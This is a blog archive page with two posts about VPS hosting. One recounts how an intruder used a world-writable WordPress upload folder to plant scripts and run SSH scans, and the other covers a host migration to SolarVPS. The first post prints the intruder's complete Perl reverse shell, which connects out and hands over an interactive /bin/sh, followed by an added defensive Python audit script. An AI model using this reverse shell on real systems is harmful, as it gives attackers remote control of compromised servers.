h4x3d.com

Archive
Tag "solarVPS"

exploit, random image however

Last time this sort of odd situation occurred was way back in 2003 when I had my h4x3d.com website(s) hosted in Germany. People were clueless, but level3 administrators figured it out. WordPress requires some folders to be CHMODDED to 777: read, write, execute, all access basically. One of those folders is the wp-content/upload folder. Different programmes, because not only WordPress is to “blame”, such as Coppermine, require similar settings for full functionality.

Anyway – someone from Switzerland (bless the logs) had uploaded a Perl script to one of the domains and was running excessive SSH scans. This was also why the VPS slowed down and became unresponsive. Since I was not able to restart it manually, I got in contact with my new VPS support at SolarVPS – they identified the scans and, with my CHMOD 777 clue dropped in, some rootkit scans and other audits, they were able to chuck out those unwanted visitors and files within an hour.

This is, frankly speaking, the support everyone is looking for. At zone.net one had varying support quality due to apparent offshoring of support to people that had no clue and merely redirected requests to the level3 techs. It seems like level3 techs reside at SolarVPS, else I wonder how they were able to almost instantaneously sort out my problems. I will have to find a solution to the upload folder problem, eventually move it outside the httpdocs? Any advice or comments?

Below you find one of the scripts that was used to call home and cause havoc. I believe this is only the “gateway” and “door opener” for more destructive commands to be executed:

c.txt
#!/usr/bin/perl
use Socket;
$cmd="lpd";
$system='/bin/sh -i';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
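
An added example, not part of the original post or of the hosting provider's tooling: a small Python audit that walks a web root and reports world-writable directories and files whose content starts like a script, whatever their extension. The function names and the sample tree (built in a temporary directory) are constructed for illustration.

```python
import os
import stat
import tempfile


def audit_upload_tree(root):
    """Return (world_writable_dirs, script_files) found under root."""
    world_writable, scripts = [], []
    for dirpath, _dirnames, filenames in os.walk(root):
        # Mode 777 sets the "other write" bit: any local user or service can drop files here.
        if os.lstat(dirpath).st_mode & stat.S_IWOTH:
            world_writable.append(dirpath)
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # ignore symlinks, sockets and devices
            try:
                with open(path, "rb") as fh:
                    head = fh.read(64)
            except OSError:
                continue  # unreadable file: skip rather than abort the audit
            # Judge by content, not extension: the script above was stored as c.txt.
            if head.startswith(b"#!") or head.lstrip().startswith(b"<?php"):
                scripts.append((path, bool(st.st_mode & 0o111)))
    return sorted(world_writable), sorted(scripts)


def build_sample_tree():
    """Constructed sample tree: a 777 upload folder with an image and a script."""
    root = tempfile.mkdtemp(prefix="webroot-")
    content = os.path.join(root, "wp-content")
    uploads = os.path.join(content, "upload")
    os.makedirs(uploads)
    os.chmod(content, 0o755)
    os.chmod(uploads, 0o777)
    with open(os.path.join(uploads, "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0constructed image bytes")
    with open(os.path.join(uploads, "c.txt"), "wb") as fh:
        fh.write(b"#!/usr/bin/perl\n# constructed placeholder, no payload\n")
    return root


if __name__ == "__main__":
    dirs, found = audit_upload_tree(build_sample_tree())
    for d in dirs:
        print("world-writable directory:", d)
    for path, is_exec in found:
        print("script content in upload tree:", path, "executable" if is_exec else "not executable")
```

Pointed at the real document root from cron, the same function flags a shebang or `<?php` file in an upload folder regardless of what it is named.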

Solar VPS - Green hosting

Today I have received an email from Sean at zone.net stating that effective from four months now onwards all VPS (Virtual Private Server) business will be transferred to SolarVPS.

Sean speaks very highly of SolarVPS’ CEO and managing director and apologises for the “crap” level of support that zone.net customers had to endure in the past few months.

The official press release can be found on Solar VPS’ news section. Being transparent about communication is one of the major pillars of decent business – “I like”.

Some famous highlights include the multi-day downtime due to some failure and a check-disk that took ages (from 11:48 AM EST (11/7/2008) to 7:19 PM EST (11/9/2008), whereas it would be more like 9am to 8pm, frankly).

Also some minor, less exciting downtimes of twelve to twenty hours recently can be recalled by some of you.

My phone calls to the 001 yank-hotline have been answered but greeted with massive unfriendliness and a really low level of knowledge, stating “we are aware that our sites (cough and yours) are currently unavailable”.

I am curious what the time at SolarVPS will bring – the mail sent by Sean listed an email address by which management might be contacted directly.

If SolarVPS prolong zone.net’s sponsorship agreement I would be keen to give them a ride.

In the meantime, if you have any other recommendations or comments, feel free to contact me.

Oh, and the new site is coming, I am currently just looking into a way to politely tell IE6 visitors (still 26% over the past few months) to upgrade or switch.

Having worked in a major PR company in the last six months and having experienced the (probably worst) “almost” over-sea like IT support, I see the problems with upgrading; however, I believe it should be possible to replace a seven year old piece of software with something newer (IE7, IE8 beta, Firefox, Opera, Safari, etc).
